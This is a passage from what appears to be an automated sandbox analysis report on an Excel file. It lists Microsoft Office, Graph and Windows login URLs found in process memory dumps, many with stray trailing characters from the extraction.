      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/;
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://graph.windows.net
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://graph.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/G
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/ent
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comd
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comsGraphx
      Source: EXCEL.EXE, 00000000.00000002.629585579.0000000012D2D000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000002.629585579.0000000012D2D000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.come
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientlO
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediac
      Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeJ
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$GA
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%DB
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&EC
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&y4
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)t9
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0HU
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4x
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5ER
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5y
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6JS
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:z
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;GP
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeAF
